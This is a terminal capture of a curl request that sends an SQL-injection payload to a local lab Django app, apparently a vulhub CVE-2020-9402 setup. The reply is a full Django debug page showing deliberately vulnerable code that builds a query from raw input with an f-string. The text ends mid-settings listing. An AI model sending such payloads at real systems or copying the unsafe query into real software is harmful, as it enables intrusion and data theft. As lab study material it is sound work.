zzz@zzz-
virtual-machine:~/Desktop$ curl -H "Host: localhost" "http://192.168.20.128:8000/?geom=SRID=4326;SELECT%20version
();--"
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="
text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>OperationalError
at /</title>
<style type="
text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background-color:#fff; color:#000; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe;
text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em;
text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#4f4f4f; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.con
text { padding:10px 0; overflow:hidden; }
div.con
text ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.con
text ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
div.con
text ol li pre { display:inline; }
div.con
text ol.con
text-line li { color:#464646; background-color:#dfdfdf; padding: 3px 2px; }
div.con
text ol.con
text-line li span { position:absolute; right:32px; }
.user div.con
text ol.con
text-line li { background-color:#bbb; color:#000; }
.user div.con
text ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555;
text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 10px 20px; }
#template-not-exist .postmortem-section { margin-bottom: 3px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em; font-weight:normal; }
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #575757; font-size: 1.5em; margin: 10px 0 10px 0; }
.append-bottom { margin-bottom: 10px; }
</style>
<script type="
text/javascript">
function hideAll
(elems
) {
for
(var e = 0; e < elems.length; e++
) {
elems[e].style.display = 'none';
}
}
window.onload = function
() {
hideAll
(document.querySelectorAll
('table.vars'
));
hideAll
(document.querySelectorAll
('ol.pre-con
text'
));
hideAll
(document.querySelectorAll
('ol.post-con
text'
));
hideAll
(document.querySelectorAll
('div.pastebin'
));
}
function toggle
() {
for
(var i = 0; i < arguments.length; i++
) {
var e = document.getElementById
(arguments[i]
);
if
(e
) {
e.style.display = e.style.display == 'none' ? 'block': 'none';
}
}
return false;
}
function varToggle
(link, id
) {
toggle
('v' + id
);
var s = link.getElementsByTagName
('span'
)[0];
var uarr =
String.fromCharCode
(0x25b6
);
var darr =
String.fromCharCode
(0x25bc
);
s.
textContent = s.
textContent == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly
(link
) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.
textContent = link.
textContent.trim
() == s1 ? s2: s1;
toggle
('browserTraceback', 'pastebinTraceback'
);
return false;
}
</script>
</head>
<body>
<div id="summary">
<h1>OperationalError
at /</h1>
<pre class="exception_value">no such column: None</pre>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://localhost/?geom=SRID=4326;SELECT%20version
();--</td>
</tr>
<tr>
<th>Django Version:</th>
<td>3.0.3</td>
</tr>
<tr>
<th>Exception Type:</th>
<td>OperationalError</td>
</tr>
<tr>
<th>Exception Value:</th>
<td><pre>no such column: None</pre></td>
</tr>
<tr>
<th>Exception Location:</th>
<td>/root/django_cve_2020_9402/app/views.py in index, line 10</td>
</tr>
<tr>
<th>Python Executable:</th>
<td>/usr/bin/python3</td>
</tr>
<tr>
<th>Python Version:</th>
<td>3.10.12</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>['/root/django_cve_2020_9402',
'/usr/lib/python310.zip',
'/usr/lib/python3.10',
'/usr/lib/python3.10/lib-dynload',
'/usr/local/lib/python3.10/dist-packages',
'/usr/lib/python3/dist-packages']</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>Sun, 30 Nov 2025 15:18:38 +0000</td>
</tr>
</table>
</div>
<div id="traceback">
<h2>Traceback <span class="commands"><a href="#" onclick="return switchPastebinFriendly
(this
);">
Switch to copy-and-paste view</a></span>
</h2>
<div id="browserTraceback">
<ul class="traceback">
<li class="frame django">
<code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py</code> in <code>inner</code>
<div class="con
text" id="c139322623517440">
<ol start="27" class="pre-con
text" id="pre139322623517440">
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> This decorator is automatically applied to all middleware to ensure that</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> no middleware leaks an exception and that the next middleware in the stack</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> can rely on getting a response instead of an exception.</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> """</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> @wraps
(get_response
)</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> def inner
(request
):</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> try:</pre></li>
</ol>
<ol start="34" class="con
text-line">
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> response = get_response
(request
)</pre> <span>…</span></li>
</ol>
<ol start='35' class="post-con
text" id="post139322623517440">
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> except Exception as exc:</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> response = response_for_exception
(request, exc
)</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> return response</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre> return inner</pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623517440', 'post139322623517440'
)"><pre></pre></li>
</ol>
</div>
<div class="commands">
<a href="#" onclick="return varToggle
(this, '139322623517440'
)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v139322623517440">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>exc</td>
<td class="code"><pre>OperationalError
('no such column: None'
)</pre></td>
</tr>
<tr>
<td>get_response</td>
<td class="code"><pre><bound method BaseHandler._get_response of <django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0>></pre></td>
</tr>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version
();--'></pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame django">
<code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>
<div class="con
text" id="c139322623522112">
<ol start="108" class="pre-con
text" id="pre139322623522112">
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> break</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> if response is None:</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> wrapped_callback = self.make_view_atomic
(callback
)</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> try:</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> response = wrapped_callback
(request, *callback_args, **callback_kwargs
)</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> except Exception as e:</pre></li>
</ol>
<ol start="115" class="con
text-line">
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> response = self.process_exception_by_middleware
(e, request
)</pre> <span>…</span></li>
</ol>
<ol start='116' class="post-con
text" id="post139322623522112">
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> # Complain if the view returned None
(a common error
).</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> if response is None:</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> if isinstance
(callback, types.FunctionType
): # FBV</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> view_name = callback.__name__</pre></li>
<li onclick="toggle
('pre139322623522112', 'post139322623522112'
)"><pre> else: # CBV</pre></li>
</ol>
</div>
<div class="commands">
<a href="#" onclick="return varToggle
(this, '139322623522112'
)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v139322623522112">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>callback</td>
<td class="code"><pre><function index at 0x7eb694005a20></pre></td>
</tr>
<tr>
<td>callback_args</td>
<td class="code"><pre>
()</pre></td>
</tr>
<tr>
<td>callback_kwargs</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>middleware_method</td>
<td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td>
</tr>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version
();--'></pre></td>
</tr>
<tr>
<td>resolver</td>
<td class="code"><pre><URLResolver 'vuln.urls'
(None:None
) '^/'></pre></td>
</tr>
<tr>
<td>resolver_match</td>
<td class="code"><pre>ResolverMatch
(func=app.views.index, args=
(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=
)</pre></td>
</tr>
<tr>
<td>response</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>self</td>
<td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td>
</tr>
<tr>
<td>wrapped_callback</td>
<td class="code"><pre><function index at 0x7eb694005a20></pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame django">
<code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>
<div class="con
text" id="c139322623521664">
<ol start="106" class="pre-con
text" id="pre139322623521664">
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> response = middleware_method
(request, callback, callback_args, callback_kwargs
)</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> if response:</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> break</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> if response is None:</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> wrapped_callback = self.make_view_atomic
(callback
)</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> try:</pre></li>
</ol>
<ol start="113" class="con
text-line">
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> response = wrapped_callback
(request, *callback_args, **callback_kwargs
)</pre> <span>…</span></li>
</ol>
<ol start='114' class="post-con
text" id="post139322623521664">
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> except Exception as e:</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> response = self.process_exception_by_middleware
(e, request
)</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> # Complain if the view returned None
(a common error
).</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> if response is None:</pre></li>
<li onclick="toggle
('pre139322623521664', 'post139322623521664'
)"><pre> if isinstance
(callback, types.FunctionType
): # FBV</pre></li>
</ol>
</div>
<div class="commands">
<a href="#" onclick="return varToggle
(this, '139322623521664'
)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v139322623521664">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>callback</td>
<td class="code"><pre><function index at 0x7eb694005a20></pre></td>
</tr>
<tr>
<td>callback_args</td>
<td class="code"><pre>
()</pre></td>
</tr>
<tr>
<td>callback_kwargs</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>middleware_method</td>
<td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td>
</tr>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version
();--'></pre></td>
</tr>
<tr>
<td>resolver</td>
<td class="code"><pre><URLResolver 'vuln.urls'
(None:None
) '^/'></pre></td>
</tr>
<tr>
<td>resolver_match</td>
<td class="code"><pre>ResolverMatch
(func=app.views.index, args=
(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=
)</pre></td>
</tr>
<tr>
<td>response</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>self</td>
<td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td>
</tr>
<tr>
<td>wrapped_callback</td>
<td class="code"><pre><function index at 0x7eb694005a20></pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame user">
<code>/root/django_cve_2020_9402/app/views.py</code> in <code>index</code>
<div class="con
text" id="c139322623518016">
<ol start="3" class="pre-con
text" id="pre139322623518016">
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre>import sqlite3</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre></pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre>def index
(request
):</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> id = request.GET.get
('id'
)</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> # 漏洞点:直接拼接 SQL,触发注入</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> conn = sqlite3.connect
('db.sqlite3'
)</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> cursor = conn.cursor
()</pre></li>
</ol>
<ol start="10" class="con
text-line">
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> cursor.execute
(f"SELECT id, name FROM app_userinfo WHERE id = {id}"
)</pre> <span>…</span></li>
</ol>
<ol start='11' class="post-con
text" id="post139322623518016">
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> results = cursor.fetchall
()</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> conn.close
()</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> data = [{'id': row[0], 'name': row[1]} for row in results]</pre></li>
<li onclick="toggle
('pre139322623518016', 'post139322623518016'
)"><pre> return JsonResponse
(data, safe=False
)</pre></li>
</ol>
</div>
<div class="commands">
<a href="#" onclick="return varToggle
(this, '139322623518016'
)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v139322623518016">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>conn</td>
<td class="code"><pre><sqlite3.Connection object at 0x7eb694722d40></pre></td>
</tr>
<tr>
<td>cursor</td>
<td class="code"><pre><sqlite3.Cursor object at 0x7eb693681040></pre></td>
</tr>
<tr>
<td>id</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version
();--'></pre></td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="OperationalError at /">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<
textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
Request Method: GET
Request URL: http://localhost/?geom=SRID=4326;SELECT%20version
();--
Django Version: 3.0.3
Python Version: 3.10.12
Installed Applications:
['django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.
staticfiles',
'app']
Installed Middleware:
['django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware']
Traceback
(most recent call last
):
File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py", line 34, in inner
response = get_response
(request
)
File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 115, in _get_response
response = self.process_exception_by_middleware
(e, request
)
File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 113, in _get_response
response = wrapped_callback
(request, *callback_args, **callback_kwargs
)
File "/root/django_cve_2020_9402/app/views.py", line 10, in index
cursor.execute
(f"SELECT id, name FROM app_userinfo WHERE id = {id}"
)
Exception Type: OperationalError at /
Exception Value: no such column: None
</
textarea>
<br><br>
<input type="submit" value="Share this traceback on a
public website">
</div>
</form>
</div>
<div id="requestinfo">
<h2>Request information</h2>
<h3 id="user-info">USER</h3>
<p>AnonymousUser</p>
<h3 id="get-info">GET</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>geom</td>
<td class="code"><pre>'SRID=4326'</pre></td>
</tr>
<tr>
<td>SELECT version
()</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>--</td>
<td class="code"><pre>''</pre></td>
</tr>
</tbody>
</table>
<h3 id="post-info">POST</h3>
<p>No POST data</p>
<h3 id="files-info">FILES</h3>
<p>No FILES data</p>
<h3 id="cookie-info">COOKIES</h3>
<p>No cookie data</p>
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>COLORTERM</td>
<td class="code"><pre>'truecolor'</pre></td>
</tr>
<tr>
<td>CONTENT_LENGTH</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>CONTENT_TYPE</td>
<td class="code"><pre>'
text/plain'</pre></td>
</tr>
<tr>
<td>DEBUGINFOD_URLS</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>DISPLAY</td>
<td class="code"><pre>':0'</pre></td>
</tr>
<tr>
<td>DJANGO_SETTINGS_MODULE</td>
<td class="code"><pre>'vuln.settings'</pre></td>
</tr>
<tr>
<td>GATEWAY_INTERFACE</td>
<td class="code"><pre>'CGI/1.1'</pre></td>
</tr>
<tr>
<td>HOME</td>
<td class="code"><pre>'/root'</pre></td>
</tr>
<tr>
<td>HTTP_ACCEPT</td>
<td class="code"><pre>'*/*'</pre></td>
</tr>
<tr>
<td>HTTP_HOST</td>
<td class="code"><pre>'localhost'</pre></td>
</tr>
<tr>
<td>HTTP_USER_AGENT</td>
<td class="code"><pre>'curl/7.81.0'</pre></td>
</tr>
<tr>
<td>LANG</td>
<td class="code"><pre>'en_US.UTF-8'</pre></td>
</tr>
<tr>
<td>LANGUAGE</td>
<td class="code"><pre>'en_US:'</pre></td>
</tr>
<tr>
<td>LC_ADDRESS</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_IDENTIFICATION</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_MEASUREMENT</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_MONETARY</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_NAME</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_NUMERIC</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_PAPER</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_TELEPHONE</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LC_TIME</td>
<td class="code"><pre>'zh_CN.UTF-8'</pre></td>
</tr>
<tr>
<td>LESSCLOSE</td>
<td class="code"><pre>'/usr/bin/lesspipe %s %s'</pre></td>
</tr>
<tr>
<td>LESSOPEN</td>
<td class="code"><pre>'| /usr/bin/lesspipe %s'</pre></td>
</tr>
<tr>
<td>LOGNAME</td>
<td class="code"><pre>'root'</pre></td>
</tr>
<tr>
<td>LS_COLORS</td>
<td class="code"><pre>'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:'</pre></td>
</tr>
<tr>
<td>MAIL</td>
<td class="code"><pre>'/var/mail/root'</pre></td>
</tr>
<tr>
<td>OLDPWD</td>
<td class="code"><pre>'/root/vulhub/django/CVE-2020-9402/src'</pre></td>
</tr>
<tr>
<td>PATH</td>
<td class="code"><pre>'/xp/server/docker:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/xp/server/docker'</pre></td>
</tr>
<tr>
<td>PATH_INFO</td>
<td class="code"><pre>'/'</pre></td>
</tr>
<tr>
<td>PWD</td>
<td class="code"><pre>'/root/django_cve_2020_9402'</pre></td>
</tr>
<tr>
<td>QUERY_
STRING</td>
<td class="code"><pre>'geom=SRID=4326;SELECT%20version
();--'</pre></td>
</tr>
<tr>
<td>REMOTE_ADDR</td>
<td class="code"><pre>'192.168.20.128'</pre></td>
</tr>
<tr>
<td>REMOTE_HOST</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>REQUEST_METHOD</td>
<td class="code"><pre>'GET'</pre></td>
</tr>
<tr>
<td>RUN_MAIN</td>
<td class="code"><pre>'true'</pre></td>
</tr>
<tr>
<td>SCRIPT_NAME</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>SERVER_NAME</td>
<td class="code"><pre>'zzz-
virtual-machine'</pre></td>
</tr>
<tr>
<td>SERVER_PORT</td>
<td class="code"><pre>'8000'</pre></td>
</tr>
<tr>
<td>SERVER_PROTOCOL</td>
<td class="code"><pre>'HTTP/1.1'</pre></td>
</tr>
<tr>
<td>SERVER_SOFTWARE</td>
<td class="code"><pre>'WSGIServer/0.2'</pre></td>
</tr>
<tr>
<td>SHELL</td>
<td class="code"><pre>'/bin/bash'</pre></td>
</tr>
<tr>
<td>SHLVL</td>
<td class="code"><pre>'1'</pre></td>
</tr>
<tr>
<td>SUDO_COMMAND</td>
<td class="code"><pre>'/bin/bash'</pre></td>
</tr>
<tr>
<td>SUDO_GID</td>
<td class="code"><pre>'1000'</pre></td>
</tr>
<tr>
<td>SUDO_UID</td>
<td class="code"><pre>'1000'</pre></td>
</tr>
<tr>
<td>SUDO_USER</td>
<td class="code"><pre>'zzz'</pre></td>
</tr>
<tr>
<td>TERM</td>
<td class="code"><pre>'xterm-256color'</pre></td>
</tr>
<tr>
<td>TZ</td>
<td class="code"><pre>'UTC'</pre></td>
</tr>
<tr>
<td>USER</td>
<td class="code"><pre>'root'</pre></td>
</tr>
<tr>
<td>XAUTHORITY</td>
<td class="code"><pre>'/run/user/1000/.mutter-Xwaylandauth.T2BDG3'</pre></td>
</tr>
<tr>
<td>XDG_CURRENT_DESKTOP</td>
<td class="code"><pre>'ubuntu:GNOME'</pre></td>
</tr>
<tr>
<td>XDG_DATA_DIRS</td>
<td class="code"><pre>'/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop'</pre></td>
</tr>
<tr>
<td>_</td>
<td class="code"><pre>'/usr/bin/python3'</pre></td>
</tr>
<tr>
<td>wsgi.errors</td>
<td class="code"><pre><_io.
TextIOWrapper name='<stderr>' mode='w' encoding='utf-8'></pre></td>
</tr>
<tr>
<td>wsgi.file_wrapper</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>wsgi.input</td>
<td class="code"><pre><django.core.handlers.wsgi.LimitedStream object at 0x7eb69366d930></pre></td>
</tr>
<tr>
<td>wsgi.multiprocess</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>wsgi.multithread</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>wsgi.run_once</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>wsgi.url_scheme</td>
<td class="code"><pre>'http'</pre></td>
</tr>
<tr>
<td>wsgi.version</td>
<td class="code"><pre>
(1, 0
)</pre></td>
</tr>
</tbody>
</table>
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>vuln.settings</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>ABSOLUTE_URL_OVERRIDES</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>ADMINS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>ALLOWED_HOSTS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>APPEND_SLASH</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>AUTHENTICATION_BACKENDS</td>
<td class="code"><pre>['django.contrib.auth.backends.ModelBackend']</pre></td>
</tr>
<tr>
<td>AUTH_PASSWORD_VALIDATORS</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>AUTH_USER_MODEL</td>
<td class="code"><pre>'auth.User'</pre></td>
</tr>
<tr>
<td>BASE_DIR</td>
<td class="code"><pre>'/root/django_cve_2020_9402'</pre></td>
</tr>
<tr>
<td>CACHES</td>
<td class="code"><pre>{'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}}</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_ALIAS</td>
<td class="code"><pre>'default'</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_
KEY_PREFIX</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_SECONDS</td>
<td class="code"><pre>600</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_AGE</td>
<td class="code"><pre>31449600</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_HTTPONLY</td>
